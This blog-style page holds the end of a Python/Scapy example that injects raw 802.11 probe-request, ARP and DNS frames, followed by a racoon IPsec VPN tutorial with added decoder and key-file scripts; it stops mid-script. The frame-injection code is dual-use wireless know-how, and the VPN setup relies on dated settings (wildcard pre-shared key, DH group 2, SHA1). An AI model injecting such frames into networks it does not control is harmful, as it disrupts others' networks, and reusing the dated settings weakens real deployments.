<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">def</span> <span class="s3">ProbeReq</span>(self,count=<span class="s2">10</span>,ssid=<span class="s2">''</span>,dst=<span class="s2">'ff:ff:ff:ff:ff:ff'</span>):</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">if</span> <span class="s4">not</span> ssid: ssid=self.ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> param = Dot11ProbeReq()</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> essid = Dot11Elt(ID=<span class="s2">'SSID'</span>,info=ssid)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> rates = Dot11Elt(ID=<span class="s2">'Rates'</span>,info=self.rates)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dsset = Dot11Elt(ID=<span class="s2">'DSset'</span>,info=<span class="s2">'</span><span class="s1">\x01</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s3">type</span>=<span class="s2">0</span>,subtype=<span class="s2">4</span>,addr1=dst,addr2=self.source,addr3=self.bssid)<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /param/essid/rates/dsset</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s3">print</span><span class="s5"> </span>'[*] 802.11 Probe Request: SSID=[%s], count=%d'<span class="s5"> % (ssid,count)</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,count=count,inter=<span class="s2">0.1</span>,verbose=<span class="s2">0</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<span style="font-size: x-small;"><br /></span>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">def</span> <span class="s2">ARP</span>(self,targetip,count=<span class="s3">1</span>,toDS=<span class="s2">False</span>):</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> <span class="s1">not</span> targetip: <span class="s1">return</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> arp = LLC()/SNAP()/ARP(op=<span class="s3">'who-has'</span>,psrc=self.srcip,pdst=targetip,hwsrc=self.source)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> # 802.11 data frame is type 2, subtype 0 (the subtype field is only 4 bits wide)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> toDS:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">0</span>,FCfield=<span class="s3">'to-DS'</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=self.bssid,addr2=self.source,addr3=<span class="s3">'ff:ff:ff:ff:ff:ff'</span>)<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /arp</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">0</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=<span class="s3">'ff:ff:ff:ff:ff:ff'</span>,addr2=self.source,addr3=self.bssid)<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /arp</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s2">print</span><span class="s5"> </span>'[*] ARP Req: who-has %s'<span class="s5"> % (targetip)</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">try</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,inter=<span class="s3">0.1</span>,verbose=<span class="s3">0</span>,count=count)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">except</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ans = sniff(lfilter = <span class="s1">lambda</span> x: x.haslayer(ARP) <span class="s1">and</span> x.op == <span class="s3">2</span>,</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> store=<span class="s3">1</span>,count=<span class="s3">1</span>,timeout=<span class="s3">1</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> <span class="s2">len</span>(ans) > <span class="s3">0</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">return</span> ans[<span class="s3">0</span>][ARP].hwsrc</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">return</span> <span class="s2">None</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">def</span> <span class="s2">DNSQuery</span>(self,query=<span class="s3">'www.google.com'</span>,qtype=<span class="s3">'A'</span>,ns=<span class="s2">None</span>,count=<span class="s3">1</span>,toDS=<span class="s2">False</span>):</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> ns == <span class="s2">None</span>: <span class="s1">return</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dstmac = self.ARP(ns)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> dstmac <span class="s1">is</span> <span class="s2">None</span>: <span class="s1">return</span> # no ARP reply for the name server; do not send to a null MAC</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dns = LLC()/SNAP()/IP(src=self.srcip,dst=ns)/<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UDP(sport=random.randint(<span class="s3">49152</span>,<span class="s3">65535</span>),dport=<span class="s3">53</span>)/<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> DNS(qd=DNSQR(qname=query,qtype=qtype))</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> # 802.11 data frame is type 2, subtype 0 (the subtype field is only 4 bits wide)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> toDS:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">0</span>,FCfield=<span class="s3">'to-DS'</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=self.bssid,addr2=self.source,addr3=dstmac)/dns</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">0</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=dstmac,addr2=self.source,addr3=self.bssid)/dns</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s2">print</span><span class="s5"> </span>'[*] DNS query %s (%s) -> %s?'<span class="s5"> % (query,qtype,ns)</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">try</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,count=count,verbose=<span class="s3">0</span>)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">except</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># main routine</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">if</span> __name__ == <span class="s2">"__main__"</span>:</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s3">print</span> <span class="s2">"""</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] 802.11 Scapy Packet Crafting Example</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] Assumes 'wlan0' is your wireless NIC!</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] Author: Joff Thyer, 2014</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11 = Scapy80211(intf=<span class="s2">'wlan0'</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.Beacon()</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.ProbeReq()</span></div>
<div class="p2">
</div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.DNSQuery(ns=<span class="s2">'10.10.10.2'</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<br /></div>
Remote Access VPN with Linux racoon and MAC-OSX (posted 2013-01-02, updated 2013-01-03)
<br />
<div class="MsoNormal">
If you use a Linux based router gateway and MAC-OSX Mountain Lion, being able to create an IPSEC VPN tunnel back to your home site can be very useful. The MAC-OSX Lion IPSEC client uses ISAKMP over UDP port 500 to negotiate the phase one key exchange parameters, and then brings up a UDP NAT-Traversal IPSEC tunnel over UDP port 4500 back to your home site.</div>
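<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The two ports above carry different framing, and a capture on the gateway is easier to read once you know it. The Python 3 decoder below is an added example, not code from the original post: it tells IKE, UDP-encapsulated ESP and NAT keepalives apart on UDP 4500 using the RFC 3948 Non-ESP Marker, and decodes the ISAKMP header fields, including the exchange type that racoon's exchange_mode setting selects. Every sample datagram is constructed inline; none of it is captured traffic.</div>

```python
"""Decode the IKE / NAT-Traversal framing the post describes (UDP 500 and 4500).

Added example, not code from the original post.  Sample datagrams are constructed
by hand below; nothing here is captured traffic.
"""
import struct

# ISAKMP exchange types, RFC 2408 section 3.1, plus the IKE DOI value for
# Quick Mode (RFC 2409 appendix A).  racoon's "exchange_mode main" selects 2.
EXCHANGE_TYPES = {
    0: "None",
    1: "Base",
    2: "Identity Protection (Main Mode)",
    3: "Authentication Only",
    4: "Aggressive",
    5: "Informational",
    32: "Quick Mode",
}

# Fixed 28-byte ISAKMP header: initiator cookie, responder cookie, next payload,
# version, exchange type, flags, message id, total length (RFC 2408 section 3.1).
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
FLAG_ENCRYPTED = 0x01         # E bit: payloads after the header are encrypted
NON_ESP_MARKER = b"\x00" * 4  # RFC 3948 section 2.2: prefixes IKE on UDP 4500
NAT_KEEPALIVE = b"\xff"       # RFC 3948 section 2.3: one-byte keepalive


def parse_isakmp_header(data):
    """Return the ISAKMP header fields of one IKE datagram as a dict."""
    if len(data) < ISAKMP_HDR.size:
        raise ValueError("datagram shorter than the ISAKMP header")
    icky, rcky, nxt, ver, xchg, flags, msgid, length = ISAKMP_HDR.unpack_from(data)
    # The length field must cover the whole datagram; a mismatch is malformed.
    if length != len(data):
        raise ValueError("ISAKMP length %d != datagram length %d" % (length, len(data)))
    return {
        "initiator_cookie": icky.hex(),
        "responder_cookie": rcky.hex(),
        "next_payload": nxt,
        "version": "%d.%d" % (ver >> 4, ver & 0x0F),
        "exchange_type": xchg,
        "exchange_name": EXCHANGE_TYPES.get(xchg, "Unknown (%d)" % xchg),
        "encrypted": bool(flags & FLAG_ENCRYPTED),
        "message_id": msgid,
        "length": length,
    }


def classify_udp4500(payload):
    """Classify a UDP/4500 payload as NAT keepalive, IKE, or UDP-encapsulated ESP.

    An ESP SPI is never zero, so a leading 4-byte zero (the Non-ESP Marker)
    unambiguously announces an IKE message; anything else is ESP (SPI, sequence).
    """
    if payload == NAT_KEEPALIVE:
        return {"kind": "nat-keepalive"}
    if len(payload) < 8:
        raise ValueError("UDP/4500 payload too short for ESP or IKE")
    if payload[:4] == NON_ESP_MARKER:
        return {"kind": "ike", "isakmp": parse_isakmp_header(payload[4:])}
    spi, seq = struct.unpack_from("!II", payload)
    return {"kind": "esp", "spi": spi, "seq": seq}


def decode_datagram(dport, payload):
    """Interpret a datagram sent to the gateway's IKE (500) or NAT-T (4500) port."""
    if dport == 500:
        return {"kind": "ike", "isakmp": parse_isakmp_header(payload)}
    if dport == 4500:
        return classify_udp4500(payload)
    raise ValueError("port %d is not an IKE/NAT-T port" % dport)


def build_isakmp(icky, rcky, xchg, msgid, flags=0, next_payload=1, body=b""):
    """Build an ISAKMP datagram with a consistent length field (for the samples)."""
    length = ISAKMP_HDR.size + len(body)
    return ISAKMP_HDR.pack(icky, rcky, next_payload, 0x10, xchg, flags, msgid, length) + body


# Constructed samples: the first Main Mode message (responder cookie still zero,
# next payload 1 = SA) on UDP 500; after NAT detection the peers move to 4500,
# where an encrypted Quick Mode message, an ESP packet and a keepalive appear.
SAMPLE_MAIN_MODE = build_isakmp(b"\x11" * 8, b"\x00" * 8, xchg=2, msgid=0, body=b"\x00" * 12)
SAMPLE_QUICK_MODE_NATT = NON_ESP_MARKER + build_isakmp(
    b"\x11" * 8, b"\x22" * 8, xchg=32, msgid=0x1234, flags=FLAG_ENCRYPTED,
    next_payload=8, body=b"\xaa" * 16)
SAMPLE_ESP_NATT = struct.pack("!II", 0xC0FFEE11, 1) + b"\xbb" * 24
SAMPLE_KEEPALIVE = NAT_KEEPALIVE

if __name__ == "__main__":
    for port, pkt in [(500, SAMPLE_MAIN_MODE), (4500, SAMPLE_QUICK_MODE_NATT),
                      (4500, SAMPLE_ESP_NATT), (4500, SAMPLE_KEEPALIVE)]:
        print("udp/%d: %s" % (port, decode_datagram(port, pkt)))
```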
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Here I include a pre-shared key based example configuration of
the Linux KAME “racoon” daemon to run as an IPSEC server, and configure the
MAC-OSX native IPSEC client to connect to it.
The Linux based server system in this example is Ubuntu 12.04.1 server
running on a Soekris NET6501-50. For
more information on what Soekris has to offer, visit the web URL <a href="http://www.soekris.com/">http://www.soekris.com/</a>. <br />
<br />
Under Ubuntu, you will need to install two different packages in order to get
started.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
# apt-get install ipsec-tools<br />
# apt-get install racoon</span>
<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
For the remainder of this example, I will assume that your Ubuntu Linux based
system has a public IP address of <b>240.9.9.9</b>,
and that your desired VPN address range is <b>10.222.1.0/24</b>. I will also assume that your router gateway
is properly configured for Network Address Translation (NAT) using iptables for
any address in your internal network, which I will take to be anything in the <b>10.0.0.0/8</b> address
range. I will also assume that you are
running your own internal network DNS server at <b>10.1.1.1</b>. Proper configuration
of iptables is not included in this blog entry.<br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">Public network address: 240.9.9.9</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">Internal LAN Network: 10.0.0.0/8</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">VPN network pool: 10.222.1.0/24</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">DNS Server: 10.1.1.1</span><br />
<span style="font-family: 'Courier New', Courier, monospace; text-indent: -0.25in;">DNS domain: “domain.tld”</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
After you have installed the “racoon” package, the
configuration file should be located at <b>/etc/racoon/racoon.conf</b>.</div>
<div class="MsoNormal">
<br />
We will start with a fully commented <b>racoon.conf</b>
example based on the above information in order to illustrate how to configure
an IPSEC VPN. This configuration uses a pre-shared key rather than certificates,
for simplicity's sake and to avoid the additional complexity of setting up your own
certificate authority and generating, signing, and importing a certificate for use.</div>
<div class="MsoNormal">
<br />
<br /></div>
<div class="MsoNormal">
</div>
<h3>
<span style="color: #0c343d;">Racoon Configuration File</span></h3>
<span style="font-family: 'Courier New', Courier, monospace; font-size: 10pt;"># set syslog level and pre-shared key file</span><br />
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">log notify;</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">path pre_shared_key "/etc/racoon/psk.txt";</span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">listen {</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> adminsock disabled; #do not listen on the admin socket</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> isakmp 240.9.9.9 [500]; #address for ISAKMP</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> isakmp_natt 240.9.9.9 [4500]; #address for ISAKMP NAT-Traversal</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> strict_address; #strictly bind these addresses</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}</span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">remote anonymous { #anonymous matches ANY ipsec client</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> exchange_mode main; #ISAKMP phase 1 exchange mode</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> ph1id 16; #phase 1 proposal identifier</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> proposal_check claim; #claim our own lifetime value<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> lifetime time 12 hour;#phase 1 lifetime<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> mode_cfg on; #gather
network information through ISAKMP<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> generate_policy on; #generate ipsec policy from initiator SA payload<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> nat_traversal on; #enable use of NAT-Traversal extension<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dpd_delay 3600; #enable dead peer
detection and set time at 3600 secs<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> proposal { #phase
1 proposal<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> encryption_algorithm aes; #phase 1 encryption algorithm<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> hash_algorithm sha1; #phase 1 hash algorithm<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> authentication_method xauth_psk_server;
#use xauth pre-shared key method<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dh_group 2; #use
diffie-hellman group 2 (modp1024)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> }<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#
specific mode configuration<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">mode_cfg
{<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> auth_source system; #user auth source (system=Unix user)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> group_source system; #group validation source (system=Unix groups)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> conf_source local; #user local pool information below<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> network4 10.222.1.50; #base/first address in VPN pool<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> netmask4 255.255.255.0; #VPN pool network mask<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> pool_size 50; #VPN
pool size<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> dns4 10.1.1.1; #VPN pool DNS
server<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> default_domain "domain.tld";#optional
VPN pool domain suffix<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> banner "/etc/racoon/motd"; #optional VPN pool message of the day<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#
security association info<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">sainfo
anonymous { #anonymous
matches any/all SA<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> encryption_algorithm aes; #phase 2 encryption algorithm(s)<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> authentication_algorithm hmac_sha1; #phase 2 authentication hash<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> compression_algorithm deflate; #phase 2 compression<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"> remoteid 16; #phase
2 remoteid to match phase 1<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">}</span><span style="font-family: Courier;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
<br />
<h3>
<span style="font-family: Courier New, Courier, monospace; font-size: small;">Linux Server Pre-Shared Key File</span></h3>
<br />
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;">Although the <b>/etc/racoon/psk.txt</b> file would typically
contain entries listing individual IP addresses, you can also have wildcard
entries. Naturally, when travelling, your
MAC-OSX client is going to have a different public IP address depending on your
location, so a wildcard entry in the pre-shared key file on the server is
the easiest solution. A better
solution, as mentioned above, would be to use a certificate rather than a
pre-shared key.</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br />
In order to generate a pre-shared key, I would suggest a relatively long random
character string. This is fairly easy
to generate using a combination of “dd” and “base64” in the UNIX world,
although other options exist. </span>
<br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">$ dd if=/dev/urandom bs=1 count=18
2>/dev/null | base64<br />
mylongrandomstring</span><br />
<br />
<span style="font-family: Times, Times New Roman, serif;">Within your /etc/racoon/psk.txt pre-shared key file on the UNIX/Linux
server, you should list one entry as follows:</span>
<br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"># pre-shared key for IPSEC VPN clients<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Courier New, Courier, monospace;">* mylongrandomstring</span><span style="font-family: Georgia, Times New Roman, serif;"><o:p></o:p></span></div>
<br />
<span style="font-family: Times, Times New Roman, serif;">
Note that the string “mylongrandomstring” would actually be the random characters
you generated from the above command.</span><br />
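As an added example (not code from the original post or from the racoon project), the script below generates the key with the dd/base64 command above, writes it as the wildcard entry of a psk.txt with mode 0600, and then validates the file's permissions and entry format; racoon rejects a pre-shared key file that group or others can read, so the mode check is the one most often tripped over. The PSK_FILE variable and the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original post or from the racoon project:
# generate a pre-shared key with the dd|base64 command the post suggests, write
# it as a wildcard entry into a racoon psk.txt with mode 0600, and validate the
# file.  PSK_FILE defaults to a scratch path so this can run unprivileged; set
# PSK_FILE=/etc/racoon/psk.txt on the router.  Function names are my own.
set -eu

PSK_FILE="${PSK_FILE:-./psk.txt}"

# 18 random bytes encode to exactly 24 base64 characters with no padding.
gen_psk() {
    dd if=/dev/urandom bs=1 count=18 2>/dev/null | base64
}

# Write psk.txt with a single wildcard entry ("* <key>").  racoon refuses a
# pre-shared key file that group or others can read, so the file is created
# under umask 077 and the mode is forced to 0600 even if it already existed.
write_psk_file() {
    (
        umask 077
        printf '# pre-shared key for IPSEC VPN clients\n* %s\n' "$2" > "$1"
    )
    chmod 600 "$1"
}

# Validate a psk.txt the way racoon will: no group/other permission bits,
# and every non-comment line is "<identifier> <key>" with a key of at least
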